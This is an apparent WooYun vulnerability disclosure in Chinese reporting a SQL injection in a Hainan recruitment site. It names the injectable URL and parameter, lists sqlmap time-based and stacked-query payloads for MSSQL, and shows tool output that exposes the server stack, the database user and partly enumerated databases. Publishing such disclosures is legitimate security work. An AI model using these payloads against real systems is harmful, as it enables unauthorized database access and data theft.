当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154577

漏洞标题:伍亿旗下琼州人才网主站sql注入漏洞(涉及13裤/延时注入)

相关厂商:海南人才招聘网

漏洞作者: 路人甲

提交时间:2015-11-20 15:46

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

注入点,时间延迟注入
http://www.hnrczpw.com/gposinfo/freejobs/searchcls/inducls.asp?id=120100
数据

Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=120100'; WAITFOR DELAY '0:0:5';-- AND 'lkGY'='lkGY
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=120100' WAITFOR DELAY '0:0:5'-- AND 'wbjf'='wbjf
---
[15:02:02] [INFO] testing MySQL
[15:02:02] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[15:02:04] [WARNING] the back-end DBMS is not MySQL
[15:02:04] [INFO] testing Oracle
[15:02:05] [WARNING] the back-end DBMS is not Oracle
[15:02:05] [INFO] testing PostgreSQL
[15:02:07] [WARNING] the back-end DBMS is not PostgreSQL
[15:02:07] [INFO] testing Microsoft SQL Server
[15:02:13] [INFO] confirming Microsoft SQL Server
[15:02:24] [INFO] adjusting time delay to 4 seconds due to good response times
[15:02:29] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[15:02:29] [INFO] fetching current user
[15:02:29] [INFO] retrieved: userjxrc
current user: 'userjxrc'


涉及13裤

[15:12:22] [INFO] adjusting time delay to 4 seconds due to good re
13
[15:12:27] [INFO] retrieved:
[15:12:55] [ERROR] invalid character detected. retrying..
[15:12:55] [WARNING] increasing time delay to 5 seconds
adsys
[15:14:55] [INFO] retrieved: di
[15:16:14] [ERROR] invalid character detected. retrying..
[15:16:14] [WARNING] increasing time delay to 6 seconds
st
[15:18:49] [ERROR] invalid character detected. retrying..
[15:18:49] [WARNING] increasing time delay to 7 seconds
er
[15:19:49] [INFO] retrieved:
[15:20:53] [ERROR] invalid character detected. retrying..
[15:20:53] [WARNING] increasing time delay to 8 seconds
[15:23:13] [ERROR] invalid character detected. retrying..
[15:23:13] [WARNING] increasing time delay to 9 seconds
mo


太慢了 没跑完

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝